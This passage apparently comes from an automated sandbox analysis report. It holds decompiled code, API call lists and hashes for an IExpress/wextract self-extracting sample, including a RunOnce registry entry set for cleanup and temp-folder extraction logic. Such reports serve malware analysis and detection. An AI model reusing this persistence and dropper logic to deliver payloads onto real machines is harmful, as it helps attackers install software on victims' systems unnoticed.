						if(_t32 == 0) {
							_t19 =  *0x10b9a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E010B1F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x10b8588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x10b9124; // 0x80070002
				return _t7;
			}


















                                                                                                                                                                                                                                    0x010b2c03
                                                                                                                                                                                                                                    0x010b2c0d
                                                                                                                                                                                                                                    0x010b2c18
                                                                                                                                                                                                                                    0x010b2c20
                                                                                                                                                                                                                                    0x010b2c2e
                                                                                                                                                                                                                                    0x010b2c32
                                                                                                                                                                                                                                    0x010b2c36
                                                                                                                                                                                                                                    0x010b2c3d
                                                                                                                                                                                                                                    0x010b2c43
                                                                                                                                                                                                                                    0x010b2c45
                                                                                                                                                                                                                                    0x010b2c47
                                                                                                                                                                                                                                    0x010b2c49
                                                                                                                                                                                                                                    0x010b2c4e
                                                                                                                                                                                                                                    0x010b2c4e
                                                                                                                                                                                                                                    0x010b2c47
                                                                                                                                                                                                                                    0x010b2c32
                                                                                                                                                                                                                                    0x010b2c20
                                                                                                                                                                                                                                    0x010b2c50
                                                                                                                                                                                                                                    0x010b2c54
                                                                                                                                                                                                                                    0x010b2c57
                                                                                                                                                                                                                                    0x010b2c64
                                                                                                                                                                                                                                    0x010b2c66
                                                                                                                                                                                                                                    0x010b2c6b
                                                                                                                                                                                                                                    0x010b2c6d
                                                                                                                                                                                                                                    0x010b2c74
                                                                                                                                                                                                                                    0x010b2c76
                                                                                                                                                                                                                                    0x010b2c7c
                                                                                                                                                                                                                                    0x010b2c7e
                                                                                                                                                                                                                                    0x010b2c87
                                                                                                                                                                                                                                    0x010b2c89
                                                                                                                                                                                                                                    0x010b2c89
                                                                                                                                                                                                                                    0x010b2c87
                                                                                                                                                                                                                                    0x010b2c7c
                                                                                                                                                                                                                                    0x010b2c74
                                                                                                                                                                                                                                    0x010b2c8e
                                                                                                                                                                                                                                    0x010b2c95
                                                                                                                                                                                                                                    0x010b2c98
                                                                                                                                                                                                                                    0x010b2c98
                                                                                                                                                                                                                                    0x010b2c9e
                                                                                                                                                                                                                                    0x010b2ca7

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetVersion.KERNEL32(?,00000002,00000000,?,010B6BB0,010B0000,00000000,00000002,0000000A), ref: 010B2C03
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,?,010B6BB0,010B0000,00000000,00000002,0000000A), ref: 010B2C18
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 010B2C28
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,010B6BB0,010B0000,00000000,00000002,0000000A), ref: 010B2C98
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                    • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                    • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                    • Opcode ID: 497f54595cfb6dc7f2f32ae445383c0bd0fde7fd9ef1b83c43ff159486fed9d8
                                                                                                                                                                                                                                    • Instruction ID: 8225e60e5048b6f737397d92c26874ec2e2425d59b683516ebb4fa225c202183
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 497f54595cfb6dc7f2f32ae445383c0bd0fde7fd9ef1b83c43ff159486fed9d8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B11E97131030AABE7706BF9ACC9AE73B9D9B54394B040055FAC4E7248DB3AF842C764
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B6F40 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E010B6F40() {

				SetUnhandledExceptionFilter(E010B6EF0); // executed
				return 0;
			}



                                                                                                                                                                                                                                    0x010b6f45
                                                                                                                                                                                                                                    0x010b6f4d

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 010B6F45
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                    • Opcode ID: f24509d71c54c208fcb60fb4c8d63ff68770545f0f04e3d4f86969ef37358696
                                                                                                                                                                                                                                    • Instruction ID: 8bbf84120a62d3b3a2f9b49e7c38fee9386bf588397a7818f5a0d394a73c91b7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f24509d71c54c208fcb60fb4c8d63ff68770545f0f04e3d4f86969ef37358696
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 149002B035110087A6601B71999949575915A4D6427815864E0A1C9448DB6654405711
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185registrylibrarymemoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E010B202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x10b8004; // 0x72151d89
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E010B6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E010B171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E010B658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x10b9a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x10b91e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x10b91e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x10b91e5);
						if(_t90 != 0) {
							 *0x10b8580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
							E010B171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E010B44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E010B658A( &_v268, 0x104, 0x10b1140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x10b8530 = _t66;
				goto L23;
			}

































                                                                                                                                                                                                                                    0x010b202a
                                                                                                                                                                                                                                    0x010b2035
                                                                                                                                                                                                                                    0x010b203c
                                                                                                                                                                                                                                    0x010b2041
                                                                                                                                                                                                                                    0x010b2050
                                                                                                                                                                                                                                    0x010b205f
                                                                                                                                                                                                                                    0x010b2064
                                                                                                                                                                                                                                    0x010b206f
                                                                                                                                                                                                                                    0x010b208c
                                                                                                                                                                                                                                    0x010b2094
                                                                                                                                                                                                                                    0x010b2257
                                                                                                                                                                                                                                    0x010b2266
                                                                                                                                                                                                                                    0x010b2266
                                                                                                                                                                                                                                    0x010b209a
                                                                                                                                                                                                                                    0x010b209b
                                                                                                                                                                                                                                    0x010b209d
                                                                                                                                                                                                                                    0x010b20aa
                                                                                                                                                                                                                                    0x010b20af
                                                                                                                                                                                                                                    0x010b20c9
                                                                                                                                                                                                                                    0x010b20d1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b20d3
                                                                                                                                                                                                                                    0x010b20da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b20da
                                                                                                                                                                                                                                    0x010b20e2
                                                                                                                                                                                                                                    0x010b2103
                                                                                                                                                                                                                                    0x010b210e
                                                                                                                                                                                                                                    0x010b2116
                                                                                                                                                                                                                                    0x010b2122
                                                                                                                                                                                                                                    0x010b2128
                                                                                                                                                                                                                                    0x010b212c
                                                                                                                                                                                                                                    0x010b2179
                                                                                                                                                                                                                                    0x010b2194
                                                                                                                                                                                                                                    0x010b21de
                                                                                                                                                                                                                                    0x010b21e4
                                                                                                                                                                                                                                    0x010b2256
                                                                                                                                                                                                                                    0x010b2256
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2256
                                                                                                                                                                                                                                    0x010b2196
                                                                                                                                                                                                                                    0x010b2196
                                                                                                                                                                                                                                    0x010b219c
                                                                                                                                                                                                                                    0x010b219f
                                                                                                                                                                                                                                    0x010b219f
                                                                                                                                                                                                                                    0x010b21a1
                                                                                                                                                                                                                                    0x010b21a2
                                                                                                                                                                                                                                    0x010b21a6
                                                                                                                                                                                                                                    0x010b21a8
                                                                                                                                                                                                                                    0x010b21b0
                                                                                                                                                                                                                                    0x010b21b0
                                                                                                                                                                                                                                    0x010b21b2
                                                                                                                                                                                                                                    0x010b21b3
                                                                                                                                                                                                                                    0x010b21bc
                                                                                                                                                                                                                                    0x010b21c7
                                                                                                                                                                                                                                    0x010b21cb
                                                                                                                                                                                                                                    0x010b21f1
                                                                                                                                                                                                                                    0x010b21f6
                                                                                                                                                                                                                                    0x010b21fd
                                                                                                                                                                                                                                    0x010b21ff
                                                                                                                                                                                                                                    0x010b21ff
                                                                                                                                                                                                                                    0x010b2204
                                                                                                                                                                                                                                    0x010b2213
                                                                                                                                                                                                                                    0x010b2218
                                                                                                                                                                                                                                    0x010b221d
                                                                                                                                                                                                                                    0x010b221d
                                                                                                                                                                                                                                    0x010b2220
                                                                                                                                                                                                                                    0x010b2220
                                                                                                                                                                                                                                    0x010b2222
                                                                                                                                                                                                                                    0x010b2223
                                                                                                                                                                                                                                    0x010b2229
                                                                                                                                                                                                                                    0x010b223d
                                                                                                                                                                                                                                    0x010b2249
                                                                                                                                                                                                                                    0x010b2250
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2250
                                                                                                                                                                                                                                    0x010b21d2
                                                                                                                                                                                                                                    0x010b21d9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b21d9
                                                                                                                                                                                                                                    0x010b213a
                                                                                                                                                                                                                                    0x010b2141
                                                                                                                                                                                                                                    0x010b2144
                                                                                                                                                                                                                                    0x010b214c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2163
                                                                                                                                                                                                                                    0x010b2172
                                                                                                                                                                                                                                    0x010b2172
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2163
                                                                                                                                                                                                                                    0x010b20ea
                                                                                                                                                                                                                                    0x010b20f0
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 010B2050
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 010B205F
                                                                                                                                                                                                                                    • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 010B208C
                                                                                                                                                                                                                                      • Part of subcall function 010B171E: _vsnprintf.MSVCRT ref: 010B1750
                                                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010B20C9
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010B20EA
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 010B2103
                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010B2122
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 010B2134
                                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010B2144
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 010B215B
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010B218C
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010B21C1
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010B21E4
                                                                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 010B223D
                                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010B2249
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010B2250
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                    • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                                                                                                                                                                                    • API String ID: 178549006-850274211
                                                                                                                                                                                                                                    • Opcode ID: 2c844b7e295a000284c5f105c164e7d298c80241febeecab68bba84ccbdf07ff
                                                                                                                                                                                                                                    • Instruction ID: 959d7ff9c199a54d1f549e7682b216867db9ef8c78183a520a13c957a8de152a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c844b7e295a000284c5f105c164e7d298c80241febeecab68bba84ccbdf07ff
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD512171A10214ABDB309F24DCC8FEB7B7CEB54740F0041A9FAC9E7145DA76AE858B60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B55A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248memorystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 232 10b55a0-10b55d9 call 10b468f LocalAlloc 235 10b55db-10b55f1 call 10b44b9 call 10b6285 232->235 236 10b55fd-10b560c call 10b468f 232->236 250 10b55f6-10b55f8 235->250 242 10b560e-10b5630 call 10b44b9 LocalFree 236->242 243 10b5632-10b5643 lstrcmpA 236->243 242->250 244 10b564b-10b5659 LocalFree 243->244 245 10b5645 243->245 248 10b565b-10b565d 244->248 249 10b5696-10b569c 244->249 245->244 252 10b5669 248->252 253 10b565f-10b5667 248->253 255 10b589f-10b58b5 call 10b6517 249->255 256 10b56a2-10b56a8 249->256 254 10b58b7-10b58c7 call 10b6ce0 250->254 257 10b566b-10b567a call 10b5467 252->257 253->252 253->257 255->254 256->255 260 10b56ae-10b56c1 GetTempPathA 256->260 270 10b589b-10b589d 257->270 271 10b5680-10b5691 call 10b44b9 257->271 264 10b56f3-10b5711 call 10b1781 260->264 265 10b56c3-10b56c9 call 10b5467 260->265 275 10b586c-10b5890 GetWindowsDirectoryA call 10b597d 264->275 276 10b5717-10b5729 GetDriveTypeA 264->276 269 10b56ce-10b56d0 265->269 269->270 273 10b56d6-10b56df call 10b2630 269->273 270->254 271->250 273->264 286 10b56e1-10b56ed call 10b5467 273->286 275->264 287 10b5896 275->287 280 10b572b-10b572e 276->280 281 10b5730-10b5740 GetFileAttributesA 276->281 280->281 284 10b5742-10b5745 280->284 281->284 285 10b577e-10b578f call 10b597d 281->285 289 10b576b 284->289 290 10b5747-10b574f 284->290 298 10b57b2-10b57bf call 10b2630 285->298 299 10b5791-10b579e call 10b2630 285->299 286->264 286->270 287->270 292 10b5771-10b5779 289->292 290->292 294 10b5751-10b5753 290->294 297 10b5864-10b5866 292->297 294->292 295 10b5755-10b5762 call 10b6952 294->295 295->289 308 10b5764-10b5769 295->308 297->275 297->276 306 10b57d3-10b57f8 call 10b658a GetFileAttributesA 298->306 307 10b57c1-10b57cd GetWindowsDirectoryA 298->307 299->289 309 10b57a0-10b57b0 call 10b597d 299->309 314 10b580a 306->314 315 10b57fa-10b5808 CreateDirectoryA 306->315 307->306 308->285 308->289 309->289 309->298 316 10b580d-10b580f 314->316 315->316 317 10b5811-10b5825 316->317 318 10b5827-10b585c SetFileAttributesA call 10b1781 call 10b5467 316->318 317->297 318->270 323 10b585e 318->323 323->297
                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                    			E010B55A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x10b8004; // 0x72151d89
				_v8 = _t28 ^ _t110;
				_t2 = E010B468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E010B468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x10b9a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x10b8b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x10b8a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E010B6517(_t82, 0x7d2, 0, E010B3210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x10b9a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x10b91e4;
									_t40 = GetTempPathA(0x104, 0x10b91e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E010B1781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E010B6952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E010B597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E010B2630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E010B658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x10b91e4;
																					E010B1781(0x10b91e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E010B5467(0x10b91e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E010B2630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E010B597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E010B5467(0x10b91e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x10b91e4;
											_t70 = E010B2630(0, 0x10b91e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x10b91e4;
												_t71 = E010B5467(0x10b91e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E010B597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x10b8b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E010B5467(0x10b8b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E010B44B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E010B44B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x10b9124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E010B44B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x10b9124 = E010B6285();
					L2:
					_t38 = 0;
				}
				L47:
				return E010B6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}





































                                                                                                                                                                                                                                    0x010b55ab
                                                                                                                                                                                                                                    0x010b55b2
                                                                                                                                                                                                                                    0x010b55c9
                                                                                                                                                                                                                                    0x010b55d5
                                                                                                                                                                                                                                    0x010b55d9
                                                                                                                                                                                                                                    0x010b5600
                                                                                                                                                                                                                                    0x010b5605
                                                                                                                                                                                                                                    0x010b560a
                                                                                                                                                                                                                                    0x010b560c
                                                                                                                                                                                                                                    0x010b5638
                                                                                                                                                                                                                                    0x010b5641
                                                                                                                                                                                                                                    0x010b5643
                                                                                                                                                                                                                                    0x010b5645
                                                                                                                                                                                                                                    0x010b5645
                                                                                                                                                                                                                                    0x010b564c
                                                                                                                                                                                                                                    0x010b5652
                                                                                                                                                                                                                                    0x010b5657
                                                                                                                                                                                                                                    0x010b5659
                                                                                                                                                                                                                                    0x010b5696
                                                                                                                                                                                                                                    0x010b569c
                                                                                                                                                                                                                                    0x010b589f
                                                                                                                                                                                                                                    0x010b58a7
                                                                                                                                                                                                                                    0x010b58ac
                                                                                                                                                                                                                                    0x010b58b3
